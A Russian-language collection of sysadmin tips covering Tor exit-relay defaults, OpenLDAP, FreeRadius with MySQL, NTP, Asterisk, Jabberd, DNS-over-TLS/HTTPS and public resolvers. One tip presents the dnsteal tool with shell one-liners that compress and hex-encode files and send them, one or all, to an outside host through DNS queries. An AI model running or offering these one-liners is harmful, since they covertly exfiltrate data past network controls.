Возможные проблемы с настройками пакета tor в Debian по умолчанию (доп. ссылка 1) Автор: Аноним [комментарии]

Пользователям пакетов, зависимых от пакета tor в Debian, следует проявить осторожность. Файл конфигурации, идущий с пакетом tor, закомментирован почти полностью, включая места, запрещающие узлу работать в режиме выходного узла Tor. Настройки по умолчанию ( ExitRelay = "auto") подразумевают работу как выходного узла при определённых условиях (если активна одна из опций - ExitPolicy, ReducedExitPolicy или IPv6Exit). Проблему усугубляет то, что от пакета tor зависит apt-transport-tor, что может привести к ситуации, когда пользователь не разбираясь установил пакет для большей безопасности, а получил доступ всех подряд в свою внутреннюю сеть и перспективу претензий со стороны правоохранительных органов, как в деле Дмитрия Богатова. Дополнение: По умолчанию активация tor не подтверждена, по крайней мере в Debian Stable, если действия пользователя не привели к изменению настроек ExitPolicy, ReducedExitPolicy и IPv6Exit.

Сетевые сервисы

DNS

FTP, Bittorrent

INN

Mail, почта

Безопасность и установка ограничений

Борьба со спамом, фильтрация почты

Отправка и пересылка сообщений на уровне пользователя

NFS

Samba

SNMP

Socks proxy

WWW, Apache httpd

Ограничение доступа и ресурсов, безопасность

Оптимизация и тюнинг Apache

Редирект, mod_rewrite

Прокси сервер Squid

ACL, ограничения трафика и пользователей

Отключение ipv6 для JavaVM (доп. ссылка 1) (доп. ссылка 2) Автор: Stepanoff [комментарии]

На системах, в которых одновременно используется IPv4 и IPv6, при работе Oracle JavaVM по умолчанию предпочтение отдается IPv6-стеку (серверные процессы привязываются к IPv6). При этом для формирования запросов по умолчанию используются IPv4-адреса (запросы отправляются по IPv4). Для изменения поведения JavaVM следует использовать опции java.net.preferIPv4Stack и java.net.preferIPv6Addresses, по умолчанию установленные в значение "false". Дополнительно в директиве sun.net.spi.nameservice.nameservers можно перечислить через запятую список DNS-серверов, которые будут использовать для резолвинга доменных имен. В качестве практического примера, можно привести ситуацию, при которой Jabber-сервер Openfire стал слушать только ipv6. Решить проблему помог запуск приложения с опцией "-Djava.net.preferIPv4Stack=true"

Устанавливаем OpenLDAP 2.4.X и PhpLdapAdmin в Ubuntu 9.10 Автор: Денис А. Ксенофонтов [комментарии]

1. Установим сервер и дадим ему имя DS 2. Домен который будет обслуживать сервер назовем LOCAL.NET 3. Правим hostname Пример /etc/hostname ds 4. Правим /etc/hosts Пример /etc/hosts 127.0.0.1 localhost 127.0.1.1 ds.local.net ds 5.Убедимся в том, что прописан домен поиска resolve.conf Пример /etc/resolve.conf domain local.net search local.net nameserver dns.local.net 6.Проверяем запись о домене поиска в interfaces Пример /etc/network/interfaces dns-search local.net 7. Обновляем репозитории apt aptitude update 8. Устанавливаем LDAP Server, на текущий момент версия 2.4.18 и утилиты к нему aptitude install ldap-server ldap-utils 9. Перейдем в каталог схем LDAP сервера cd /etc/ldap/schema 10. Подключаем основные схемы ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/ldap/schema/cosine.ldif ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/ldap/schema/inetorgperson.ldif ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/ldap/schema/nis.ldif Если все удачно увидим ответ следующего вида SASL/EXTERNAL authentication started SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth SASL SSF: 0 adding new entry "cn=cosine,cn=schema,cn=config" 11. Подключаем внутренние модули и создаем базу данных для LDAP Создаем файл db.ldif: # Подключаем модуль для динамической загрузки dn: cn=module{0},cn=config objectClass: olcModuleList cn: module olcModulepath: /usr/lib/ldap olcModuleload: {0}back_hdb # Создаем базу данных для нашего домена dn: olcDatabase={1}hdb,cn=config objectClass: olcDatabaseConfig objectClass: olcHdbConfig olcDatabase: {1}hdb olcDbDirectory: /var/lib/ldap olcSuffix: dc=local,dc=net olcRootDN: cn=admin,dc=local,dc=net olcRootPW: ваш password у меня example olcDbConfig: {0}set_cachesize 0 2097152 0 olcDbConfig: {1}set_lk_max_objects 1500 olcDbConfig: {2}set_lk_max_locks 1500 olcDbConfig: {3}set_lk_max_lockers 1500 olcLastMod: TRUE olcDbCheckpoint: 512 30 olcDbIndex: uid pres,eq olcDbIndex: cn,sn,mail pres,eq,approx,sub olcDbIndex: objectClass eq 12. Сохраняем файл 13. Подгружаем модуль и инициализируем базу данных ldapadd -Y EXTERNAL -H ldapi:/// -f db.ldif SASL/EXTERNAL authentication started SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth SASL SSF: 0 adding new entry "olcDatabase={1}hdb,cn=config" 14. Генерируем пароль в MD5: slappasswd -h {MD5} скопируем результат вывода {MD5}Gnmk1g3mcY6OWzJuM4rlMw== 15. Создаем базовый DN и пользователя admin Внесем в файл base.ldifследующие параметры: dn: dc=local,dc=net objectClass: dcObject objectclass: organization o: local.net dc: local description: My LDAP Root dn: cn=admin,dc=local,dc=net objectClass: simpleSecurityObject objectClass: organizationalRole cn: admin userPassword: {MD5}Gnmk1g3mcY6OWzJuM4rlMw== #Наш пароль в MD5 description: LDAP administrator Создаем базовый DN ldapadd -Y EXTERNAL -H ldapi:/// -f base.ldif SASL/EXTERNAL authentication started SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth SASL SSF: 0 adding new entry "dc=local,dc=net" adding new entry "cn=admin,dc=local,dc=net" 16. Устанавливаем права доступа на CN=config Пропишем в файл acl-config.ldif следующие права: dn: cn=config changetype: modify delete: olcAuthzRegexp dn: olcDatabase={-1}frontend,cn=config changetype: modify delete: olcAccess dn: olcDatabase={0}config,cn=config changetype: modify delete: olcRootDN dn: olcDatabase={0}config,cn=config changetype: modify add: olcRootDN olcRootDN: cn=admin,cn=config dn: olcDatabase={0}config,cn=config changetype: modify add: olcRootPW olcRootPW: {MD5}Gnmk1g3mcY6OWzJuM4rlMw== dn: olcDatabase={0}config,cn=config changetype: modify delete: olcAccess Устанавливаем права на cn=config ldapadd -Y EXTERNAL -H ldapi:/// -f acl-config.ldif SASL/EXTERNAL authentication started SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth SASL SSF: 0 modifying entry "cn=config" modifying entry "olcDatabase={-1}frontend,cn=config" modifying entry "olcDatabase={0}config,cn=config" modifying entry "olcDatabase={0}config,cn=config" modifying entry "olcDatabase={0}config,cn=config" modifying entry "olcDatabase={0}config,cn=config" 17. Устанавливаем права доступа к корню cn=config Установим права на корень в файле root-acl.ldif dn: olcDatabase={1}hdb,cn=config add: olcAccess olcAccess: to attrs=userPassword,shadowLastChange by \ dn="cn=admin,dc=local,dc=net" write by anonymous auth by self write by * none olcAccess: to dn.base="" by * read olcAccess: to * by dn="cn=admin,dc=local,dc=net" write by * read Модифицируем права ldapmodify -x -D cn=admin,cn=config -W -f root-acl.ldif Enter LDAP Password: example modifying entry "olcDatabase={1}hdb,cn=config" Все OpenLDAP готов к работе 18. Ставим phpldapadmin aptitude install phpldapadmin 19. После установки заходим по адресу http://имя сервера/phpldapadmin 20. Если все правильно установилось то увидим приглашение login 21. Если видим ошибку вида ERROR! E_STRICT: Declaration of AJAXTree::draw_dn() should be compatible with that of PLMTree::draw_dn() То в файле /usr/share/phpldapadmin/lib/AJAXTree.php Находим protected function draw_dn($dn,$level=0,$first_child=true,$last_child=true) Меняем protected function draw_dn($dn,$level,$first_child=true,$last_child=true) 22. Правим файл настроек phpldapadmin Редактируем /usr/share/phpldapadmin/config/config.php Меняем 'dc=example,dc=com' на 'dc=local,dc=net’ 23. Проверяем http://имя сервера/phpldapadmin

Настройка FreeRadius с привязкой к MySQL (доп. ссылка 1) Автор: shadow_alone [комментарии]

Рассмотрим как настроить радиус-сервер с привязкой к базе данных в MySQL на примере CentOS, FreeRadius и MySQL. Сейчас очень многие устрйства поддерживают работу через Radius, например точки доступа Wi-Fi. Устанавливаем MySQL, если он конечно у Вас уже не стоит yum install mysql mysql-devel mysql-server chkconfig --levels 235 mysqld on /etc/init.d/mysqld start netstat -tap | grep mysql получаем: netstat -tap | grep mysql tcp 0 0 *:mysql *:* LISTEN 2793/mysqld установим пароль для пользователя root для MySQL: mysqladmin -u root password 123456 Устанавливаем FreeRadius yum install freeradius freeradius-mysql Правим файл /etc/raddb/users, добавляем: shad Auth-Type := Local, User-Password == "test" Service-Type = Framed-User, Framed-Protocol = PPP, Framed-IP-Address = 192.168.0.7, Framed-IP-Netmask = 255.255.255.0, правим /etc/raddb/clients.conf раздел client 127.0.0.1 должен выглядеть вот так: client 127.0.0.1 { secret = 123 shortname = localhost nastype = other } проверяем: radiusd -X на другой консоли radtest shad test localhost 1812 123 получаем: Sending Access-Request of id 35 to 127.0.0.1 port 1812 User-Name = "shad" User-Password = "test" NAS-IP-Address = 255.255.255.255 NAS-Port = 1812 rad_recv: Access-Accept packet from host 127.0.0.1:1812, id=35, length=44 Service-Type = Framed-User Framed-Protocol = PPP Framed-IP-Address = 192.168.0.7 Framed-IP-Netmask = 255.255.255.0 Радиус работает и отвечает перейдем к настройкам MySQL mysql -u root -p mysql>CREATE DATABASE radius; mysql>GRANT ALL ON radius.* TO radius@localhost IDENTIFIED BY "123"; mysql>\q mysql -u root -p radius </usr/share/doc/freeradius-1.1.3/examples/mysql.sql проверяем: mysql -u root -p mysql>use database radius; mysql>show tables; mysql>\q правим /etc/raddb/sql.conf, раскомментируем readclients = yes правим /etc/raddb/radiusd.conf в секциях authorize{}, authorize{}, session{}, post-auth{} раскомментируем sql получиться примерно так: authorize { preprocess chap mschap suffix eap sql pap } Заполним базу в MySQL: mysql -u root -p mysql> use database radius; mysql> INSERT INTO radcheck (UserName, Attribute, Value) VALUES ('testsql', 'Password', 'test123'); проверяем: mysql> select * from radcheck where UserName='testsql'; mysql>\q правим /etc/raddb/sql.conf выставляем правильные значения: server = "localhost" login = "radius" password = "123" radius_db = "radius" в файле /etc/raddb/users комментируем строки #DEFAULT Auth-Type = System # Fall-Through = 1 запускаем radiusd -X на другой консоли radtest testsql test123 localhost 1812 123 если получили Access-Accept, то всё в порядке, связка FreeRadius+MySQL работает, теперь можете заполнять таблицы DB нужными значениями и использовать в своих устройствах авторизации через ваш радиус, для этого IP устройства надо добавить в /etc/raddb/clients.conf, примерно так: client 192.168.0.55 { secret = MysUp3rseCr3t shortname = my_device_name nastype = other } Удачной работы!!!

Настройка синхронизации времени на сервере FreeBSD (доп. ссылка 1) Автор: Litos [комментарии]

Прописываем в /etc/rc.conf ntpdate_enable="YES" ntpd_enable="YES" Первая строка будет запускать ntpdate при ребуте сервера чтобы система загрузилась с правильно установленными часами. Вторая строка запустит демон ntpd, который будет заведовать плавной корректировкой времени в дальнейшем. Далее в /etc/ntp.conf пишем (рекомендуемые сервера с ntp.org) server 0.pool.ntp.org server 1.pool.ntp.org server 2.pool.ntp.org restrict 127.0.0.1 Строка restrict 127.0.0.1 разрешает управление демоном ntpd только с localhost (например для работы утилиты ntpd), можно вообще закрыть доступ написав restrict default ignore или разрешить только из локальной сети restrict 192.168.1.0 mask 255.255.255.0 nomodify notrap разрешит синхронизацию времени, но запретит настраивать сервер или быть равноправными участниками синхронизации времени. И собственное все, подводим часы # /etc/rc.d/ntpdate start Setting date via ntp. 23 Jan 00:56:48 ntpdate[928]: step time server 193.125.143.140 offset 0.027002 sec и запускаем демон # /etc/rc.d/ntpd start Starting ntpd. Смотрим что ntpd запустился нормально # ps ax|grep ntpd 1044 ?? Ss 0:00,04 /usr/sbin/ntpd -c /etc/ntp.conf -p /var/run/ntpd.pid -f /var/db/ntpd.drift # tail /var/log/messages Jan 23 00:57:09 lola ntpd[1043]: ntpd 4.2.4p5-a Mon Jan 5 16:59:33 IRKT 2009 (1) # ntpq -p remote refid st t when poll reach delay offset jitter petrel.telecom. 192.36.143.150 2 u 60 64 1 119.017 5082.52 0.004 hornet.itconnec 89.111.168.177 4 u 59 64 1 134.423 5086.05 0.004 jane.telecom.mi 192.36.143.151 2 u 58 64 1 120.222 5086.08 0.004

Шаблоны в конфигурационных файлах Asterisk (sip.conf) (доп. ссылка 1) Автор: Romik [комментарии]

Никогда не обращал внимание на такую особенность sip.conf, случайно заметил, что если делать ------ cut ------ [100](!) context=100 secret=cdm13m-0r9j345 type=friend host=dynamic nat=yes disallow=all allow=ulaw [200](100) context=200 secret=014nm015m9g-f,138n ------ cut ------ , то 200 сможет зарегистрироваться, а 100 - нет, и в sip show peers его тоже не будет, он может использоваться только как шаблон. Правильный вариант будет таким: ------ cut ------ [simple-template](!) type=friend host=dynamic nat=yes disallow=all allow=ulaw [100](simple-template) context=100 secret=cdm13m-0r9j345 [200](simple-template) context=200 secret=014nm015m9g-f,138n ------ cut ------ То есть отдельно создается шаблон, и отдельно пиры/френды. // Шаблоны в Asterisk IP PBX используются не только в sip.conf, но и в других конфигурационных файлах. См. http://www.voip-info.org/wiki/view/Asterisk+config+template и далее по ссылкам.

Настройка bluetooth соединения в Asus EeePC [комментарии]

Не смотря на то, что в EeePС нет встроенного bluetooth адаптера, к нему легко можно подключить внешний bluetooth брелок с USB интерфейсом. Все необходимые консольные приложения доступны после установки пакета: apt-get install bluez-utils К сожалению для eeepc отсутствуют GUI хелперы для связывания устройств, из того что есть в репозиториях debian etch и xandros (например kdebluetooth), из-за проблем с зависимостями пакетов, подходит только bluez-gnome. Если bluetooth устройство самостоятельно может инициировать связывание, то все нормально, если нет - при попытке связать устройства используя только консольные средства начинаются проблемы, в bluez 3.x был изменен механизм связывания устройств, если ранее достаточно было создать простой скрипт для вывода PIN и прописать в options секцию hcid.conf - "pin_helper /etc/bluetooth/feed-pin.sh;", то теперь для получения PIN используется DBUS. В комплекте с bluez поставляется программа passkey-agent, предназначенная для связывания устройств, в пакет bluez-utils в Debian GNU/Linux эта программа по каким-то соображениям не была включена. Исходные тексты программы можно найти в /usr/share/doc/bluez-utils/examples, но для сборки потребуется установка окружения для сборки программ, что в условиях небольшого SSD диска не вполне оправдано. Запускается агент примерно так: passkey-agent --default 1234 где, 1234 пароль для связывания. Выход нашелся в апплете bluetooth-applet, который входит в состав пакета bluez-gnome. Запустив который при попытке связывания появляется диалоговое окно для ввода пароля связывания. Для настройки GPRS через сотовый телефон с Bluetooth интерфейсом можно использовать пакет 3egprs (устанавливает иконку на десктоп и скрипт /usr/sbin/gprsconf) с сайта http://www.3eportal.com/ Другой вариант - инициирование ppp сессии из консоли. Ниже пример настройки: Подключаем bluetooth адаптер в USB порт. Через dmesg смотрим, нашелся ли дня него драйвер. Запускаем инициализацию bluez: /etc/init.d/bluetooth start Смотрим поднялся ли интерфейс: hciconfig Если статус down, поднимаем его: hcicofig hci0 up Сканируем доступные устройства: hcitool scan Запоминаем адрес устройства. Для примера проверяем его доступность: l2ping 00:0A:0B:0C:0D:0E Адрес можно посмотреть командой: hcitool dev а определить поддерживаем ли bluetooth устройство GPRS: sdptool search DUN Создаем rfcomm интерфейс: rfcomm bind 0 [полученный адрес] 1 По идее rfcomm должен создаться автоматически, при надлежащей настройке /etc/bluetooth/rfcomm.conf, например: rfcomm0 { bind yes; device 00:0A:0B:0C:0D:0E; channel 1; comment "Mobile"; } Далее создаем файл конфигурации для pppd, /etc/ppp/peers/mts: lcp-echo-failure 0 lcp-echo-interval 0 /dev/rfcomm0 connect "/usr/sbin/chat -v -f /etc/ppp/peers/gprs" 115200 crtscts debug ipcp-accept-local noauth usepeerdns defaultroute noipdefault nodetach /etc/ppp/peers/gprs: ABORT BUSY ABORT 'NO CARRIER' ABORT VOICE ABORT 'NO DIALTONE' ABORT 'NO DIAL TONE' ABORT 'NO ANSWER' ABORT DELAYED '' 'AT' 'OK' 'AT+CGDCONT=1,"IP","internet.mts.ru"' 'OK' 'ATDT*99***1#' TIMEOUT 30 CONNECT Для beeline заменяем "internet.mts.ru" на "internet.beeline.ru", для мегафона пишем просто "internet". Подключаемся выполнив команду: pppd call mts Перевод wiki-страницы о настройке Bluetooth в Asus EeePC, выполненный Сгибневым Михаилом, можно найти на странице: https://www.opennet.ru/base/modem/bluetooth_eeepc.txt.html

Установка и настройка JUD для Jabberd2 под FreeBSD 6.1 (доп. ссылка 1) Автор: protonix [обсудить]

0. Создание пользователя jabber из группы jabber #adduser 1. Установка Jabber думую не вызывает проблем - в портах /usr/ports/net-im/jabberd #make install clean 2. Настройка Можно ниче не менять и оставить все поумолчанию,но желательно изменить в файлах /usr/local/etc/jabberd/sm.xml /usr/local/etc/jabberd/c2s.xml Если сервер будет не только для локальной сети, а со связью с глобальными, то также меняем в /usr/local/etc/jabberd/s2s.xml /usr/local/etc/jabberd/resolver.xml Если нет то можно закоментить в jabber.cfg эти части меняем имя сервера, и пароль (хотя можно и не менять) id имя сервера - это то что после @ =) может быть любое (по умолчанию localhost) user имя для router.xml (jabberd) pass пароль тоже для router.xml (secret) Еще проблемы были с паролем в файле router-users.xml - если везде поменяли, то и здесь не забудьте 3. Настройка БД по умолчанию используется MySQL, ниче менять не будем. заходим под рутом в MySQL и запускаем скрипт (должны находиться в папке со скриптом /usr/local/share/jabberd) mysql -u root -p mysql>\. db-setup.mysql добавляем пользователя (jabberd2) БД и пароль (secret) к нему GRANT select,insert,delete,update ON jabberd2.* to jabberd2@localhost IDENTIFIED by 'secret'; если изменили, не забудьте изменить и в sm.xml на всякий случай делаем ссылку ln -s /var/lib/mysql/mysql.sock /tmp/mysql.sock Попробуйте запустить - заходим под jabber и набираем >jabberd В /var/logs/messages смотрим результат - должно быть реди если не запустился,то гдето косяк,запускаем в отладочном режиме >jabberd -D смотрим на чем сервер умирает и исправляем 4. Установка users-agent /usr/ports/net-im/jabber-users-agent #make install clean 5. Настройка users-agent в /usr/local/etc/ опять изменяем конфиг имя,пароль,имя БД(jud),пароль БД(jud) 6. Настройка БД можно наверно запустить скрипт,но говорят он не работает,поэтому пишем сами CREATE DATABASE JUD; GRANT ALL PRIVILEGES ON JUD.* to jud@localhost IDENTIFIED BY 'jud'; CREATE TABLE JUD.jud (jid VARCHAR(100) PRIMARY KEY, name VARCHAR(100), first VARCHAR(50), last VARCHAR(50),nick VARCHAR(50), email VARCHAR(50), INDEX ind_name (name), INDEX ind_first (first), INDEX ind_last (last), INDEX ind_nick (nick), INDEX ind_email (email)); 7. Все запускаем из под пользователя jabber - сначала сам джаббер-сервер >jabberd можно в фоновом режиме с параметром -B Потом users-agent в папке /usr/local/lib/jabber/users-agent >./users-agent Все проверяйте в PSI - создавать аккаунты и пытаться найти себя=) Какие были у меня проблемы: Читал всякие вики и ртфм и запутался=) : а)Проблемы с правами доступа, так как запускать можно только от пользователя Jabber,не забудьте для конфигов поставить права доступа б)Исправление файла router-users.xml - нигде вроде не встречал, поэтому и не исправлял в)Устанавливать надо jabber-users-agent, а не jabber-JUD =) г)Перловский скрипт запускается с ./ =) д)Если был до другой джаббер сервер все сносите деинсталом и подчищайте вручную Вообщето все лежит на http://jabberd.jabberstudio.org/2/docs/jabberd_guide.html но там много и на английском.И еще помогло http://ru.gentoo-wiki.comНастройка_JUD_на_сервере_Jabberd_версии_2.x

Как в программе, запущенной через inetd, узнать IP адрес клиента. [комментарии]

В /etc/hosts.allow (man hosts_access;man hosts_options): # IP в REMOTE_ADDR popa3d: ALL : setenv REMOTE_ADDR %a : allow # имя хоста в REMOTE_ADDR popa3d: ALL : setenv REMOTE_ADDR %h : allow В программе IP адрес получаем через getenv("REMOTE_ADDR").

DNS

Организация шифрованного доступа к DNS-серверу BIND (DNS-over-TLS) при помощи nginx (доп. ссылка 1) [комментарии]

Для предоставления клиентам возможности доступа к DNS-серверу на основе BIND с использованием протокола DNS-over-TLS можно настроить TLS-прокси с использованием nginx. Для добавления TLS-слоя поверх DNS можно использовать модуль stream для nginx, который прозволяет организовать проброс произвольных TCP- и UDP-соединений. Пример nginx.conf: user www-data; worker_processes auto; pid /run/nginx.pid; events { worker_connections 1024; } stream { upstream dns_tcp_servers { # IP и порт DNS-сервера, на который будет делать проброс server 127.0.0.1:53; } # Прикрепляем к 853 порту слой TLS, пробрасываемый на локальный DNS-сервер server { listen 853 ssl; proxy_pass dns_tcp_servers; ssl_certificate /etc/nginx/ssl/certificates/privacydns.crt; ssl_certificate_key /etc/nginx/ssl/certificates/privacydns.key; ssl_protocols TLSv1.2; ssl_ciphers ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384; ssl_session_tickets on; ssl_session_timeout 4h; ssl_handshake_timeout 30s; } } Сертификат можно получить через Let's Encrypt. certbot certonly -d privacydns.example.com --standalone На стороне клиента в качестве резолвера можно использовать Unbound, Knot или stubby.

Защита от подмены серверных TLS-сертификатов в результате MITM-атаки провайдером (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Для предотвращения получения TLS-сертификатов третьими лицами, которые в ходе MITM-атаки могут контролировать трафик сервера, рекомендовано использовать DNS-запись CAA, через которую можно указать какой именно удостоверяющий центр и какая именно учётная запись в этом удостоверяющем центре авторизированы на выдачу сертификата для домена. CAA поддерживается в Let's Encrypt и не позволяет запросить сертификат, используя другой ACME-ключ. Для включения привязки в DNS-зону следует добавить: для привязки домена example.com к удостоверяющему центру letsencrypt.org: example.com. IN CAA 0 issue "letsencrypt.org" для дополнительно привязки к учётной записи acme-v02.api.letsencrypt.org/acme/acct/1234567890 example.com. IN CAA 0 issue "letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/1234567890" DNS-сервер должен быть размещён на отдельном сервере, не подверженном MITM-атаке. Для дополнительной защиты от подмены DNS необходимо использовать протокол DNSSEC, который помешает атакующим подменить DNS-ответы с записью CAA. Дополнительно рекомендовано через Tor или внешние хосты наладить автоматический мониторинг отсутствия подмены сертификатов, и подключиться к сервисам мониторинга CT-логов (Certificate Transparency, отражают выданные удостоверяющими центрами сертификаты) или вручную отслеживать появление незапрошенных сертификатов в CT-логах (https://crt.sh/). Также рекомендовано выбирать размещённых в разных странах операторов хостинга, регистрации домена, DNS и удостоверяющих центров.

Включение DNS over TLS в Fedora (доп. ссылка 1) [комментарии]

Включаем DNSOverTLS в настройках systemd-resolved. /etc/systemd/resolved.conf [Resolve] DNS=1.1.1.1 9.9.9.9 DNSOverTLS=yes DNSSEC=yes FallbackDNS=8.8.8.8 1.0.0.1 8.8.4.4 Переводим NetworkManager на использование systemd-resolved, которому будут передаваться параметры DNS, полученные через DHCP для переопределения настроек /etc/systemd/resolved.conf. Создаём файл /etc/NetworkManager/conf.d/10-dns-systemd-resolved.conf и записываем в него [main] dns=systemd-resolved Если необходимо всегда использовать список DNS-серверов, заданных в /etc/systemd/resolved.conf, вместо dns=systemd-resolved нужно указать "dns=none". Запускаем необходимые сервисы: sudo systemctl start systemd-resolved sudo systemctl enable systemd-resolved sudo systemctl restart NetworkManager По умолчанию systemd-resolved отключён, но его планируют активировать в Fedora 33. Проверяем, что всё работает нормально. В /etc/resolv.conf должен быть указан 127.0.0.53 $ resolvectl status MulticastDNS setting: yes DNSOverTLS setting: yes DNSSEC setting: yes DNSSEC supported: yes Current DNS Server: 1.1.1.1 DNS Servers: 1.1.1.1 9.9.9.9 Fallback DNS Servers: 8.8.8.8 1.0.0.1 8.8.4.4 $ sudo ss -lntp | grep '$State\|:53 $' State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* users:(("systemd-resolve",pid=10410,fd=18)) $ resolvectl query example.com fedoraproject.org: 93.184.216.34 -- link: wlp58s0

Включение DNS-over-HTTPS в Chrome (доп. ссылка 1) [комментарии]

В феврале в кодовую базу Chromium без лишней огласки была добавлена недокументированная возможность использования DNS-over-HTTPS (DoH). Если в обычной ситуации DNS-запросы напрямую отправляются на определённые в конфигурации системы DNS-серверы, то в случае DoH запрос на определение IP-адреса хоста инкапсулируется в трафик HTTPS и отправляется на HTTP-сервер, на котором резолвер обрабатывает запросы через Web API. Существующий стандарт DNSSEC использует шифрование лишь для аутентификации клиента и сервера, но не защищает трафик от перехвата и не гарантирует конфиденциальность запросов. Для использования DoH-сервера компании Cloudflare следует запустить Chrome с опциями: chrome --enable-features="dns-over-https<DoHTrial" \ --force-fieldtrials="DoHTrial/Group1" \ --force-fieldtrial-params="DoHTrial.Group1:server/https%3A%2F%2Fcloudflare-dns%2Ecom%2Fdns-query/method/POST В Firefox начиная с конца сентября поддержка DNS-over-HTTPS будет поступательно включаться по умолчанию. Для включения DoH не дожидаясь активации по умолчанию, в about:config следует изменить значение переменной network.trr.mode: * 0 полностью отключает DoH; * 1 - используется DNS или DoH, в зависимости от того, что быстрее; * 2 - используется DoH по умолчанию, а DNS как запасной вариант; * 3 - используется только DoH; * 4 - режим зеркалирования при котором DoH и DNS задействованы параллельно. По умолчанию используется DNS-сервер CloudFlare, но его можно изменить через параметр network.trr.uri, например, можно установить "https://dns.google.com/dns-query" ("https://9.9.9.9/dns-query") "https://dns.quad9.net/dns-query" "https://doh.opendns.com/dns-query" "https://cloudflare-dns.com/dns-query" ("https://1.1.1.1/dns-query") "https://doh.cleanbrowsing.org/doh/family-filter/" "https://doh.dns.sb/dns-query"

Список общедоступных DNS-резолверов [комментарии]

8.8.8.8, 8.8.4.4 - Google (поддерживается DNS over TLS)
1.1.1.1, 1.0.0.1 - CloudFlare (поддерживается DNS over TLS)
9.9.9.9, 149.112.112.112 - Quad9 (блокируются вредоносные хосты и поддерживается DNS over TLS)
77.88.8.7, 77.88.8.3 - Yandex (блокируются вредоносные хосты)
208.67.222.222, 208.67.220.220 - OpenDNS/Cisco (блокируются вредоносные хосты и сайты для взрослых, поддерживается DNSCrypt и DNS over TLS))
8.26.56.26, 8.20.247.20 - Comodo (блокируются вредоносные хосты, поддерживается DNSCrypt и DNS over TLS)
185.228.168.168, 185.228.169.168 - CleanBrowsing.org (блокируется хосты с сайтами для взрослых, поддерживается DNSCrypt)
84.200.69.80, 84.200.70.40 - DNS Watch (не ведутся логи)
37.235.1.174, 37.235.1.177 - FreeDNS (не ведутся логи)
45.77.165.194, 45.32.36.36 - Fourth Estate (не ведутся логи)
91.239.100.100, 89.233.43.71 - UncensoredDNS (первый anycast, второй размещён в Дании)
64.6.64.6, 64.6.65.6 - Verisign
4.2.2.[1-6] - Level 3 Communications (4.2.2.1 - 4.2.2.6)

Включение ESNI и DNS over HTTPS в Firefox (доп. ссылка 1) [комментарии]

Включения network.security.esni.enabled=true в about:config недостаточно для активации в Firefox TLS-расширения ESNI (Encrypted Server Name Indication), обеспечивающего шифрование данных о хосте, запрашиваемом в рамках HTTPS-соединения. На данным момент ESNI не работает без использования встроенного в Firefox резолвера "DNS over HTTPS" (network.trr.mode = 2). Использовать ESNI пока можно только при активации "DNS over HTTPS". Для включения "DNS over HTTPS" в about:config следует изменить значение переменной network.trr.mode. Значение 0 полностью отключает DoH; 1 - используется DNS или DoH, в зависимости от того, что быстрее; 2 - используется DoH по умолчанию, а DNS как запасной вариант; 3 - используется только DoH; 4 - режим зеркалирования при котором DoH и DNS задействованы параллельно. По умолчанию используется DNS-сервер CloudFlare, но его можно изменить через параметр network.trr.uri, например, можно установить: * https://dns.google.com/experimental * https://cloudflare-dns.com/dns-query * https://dns.quad9.net/dns-query (он же https://9.9.9.9/dns-query) * https://doh.powerdns.org * https://doh.cleanbrowsing.org/doh/family-filter/ (с родительским контролем) * https://doh2.dnswarden.com (с родительским контролем) * https://dns.dnsoverhttps.net/dns-query (проброс запросов через tor) * https://doh.securedns.eu/dns-query (заявлено об отсутствии ведения логов) * https://doh.crypto.sx/dns-query (на базе doh-proxy) * https://doh-de.blahdns.com/dns-query (используется реализация на Go) * https://dns.dns-over-https.com/dns-query (используется реализация на Go) * https://commons.host (реализация на Node.js)

Скрытая отправка файлов через DNS [комментарии]

В рамках проекта https://github.com/m57/dnsteal развивается фиктивный DNS-сервер, позволяющий организовать скрытую отправку файлов по протоколу DNS, используя штатные системные утилиты резолвинга. Для уменьшения трафика поддерживается сжатие передаваемого содержимого. Запускаем сервер ("-z" - включает сжатие): python dnsteal.py 192.168.1.1 -z Для отправки файла send.txt на внешний хост 192.168.1.1, на котором запущен dnsteal, достаточно выполнить: for b in $(gzip -c send.txt | xxd -p); do dig @192.168.1.1 $b.filename.com; done Для отправки всех файлов из текущей директории for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @192.168.1.1 %b.$filename.com; done; done

Настройка CustomDNS (DynDNS) на маршрутизаторе Cisco Автор: serg-dn [комментарии]

Шаблон настроек Cisco IOS для обновления хоста MyHost своего домена My-DNS-Domain.com в DynDNS. Конфигурация для ADSL. Проверено на Cisco IOS Software, C870 Software (C870-ADVIPSERVICESK9-M), Version 12.4(24)T4. Для обновления раз в час необходима подписка на услугу DynDNS Pro, для корректной регистрации должна быть активирована услуга Custom DNS. Пример конфигурационного файла: ! hostname MyHost ! ip domain lookup source-interface Dialer1 ip domain name My-DNS-Domain.com ip host ns1.mydyndns.org 204.13.248.76 ip host ns3.mydyndns.org 208.78.69.76 ip host ns4.mydyndns.org 91.198.22.76 ip host ns5.mydyndns.org 203.62.195.76 ip host ns2.mydyndns.org 204.13.249.76 ip name-server 1.1.1.1 ip name-server 1.1.1.2 ! ip ddns update method mydns HTTP add http://XXX:XXX@members.dyndns.org/nic/update?system=custom& hostname=MyHost.My-DNS-Domain.com remove http://XXX:XXX@members.dyndns.org/nic/update?system=custom&hostname=MyHost.My-DNS-Domain.com interval maximum 0 0 1 30 ! ! access-list 1500 permit any ! interface Dialer1 ip ddns update hostname MyHost.My-DNS-Domain.com ip ddns update mydns host members.dyndns.org ip access-group 1500 out !

Организация работы Opera и других приложений через Socks (доп. ссылка 1) [комментарии]

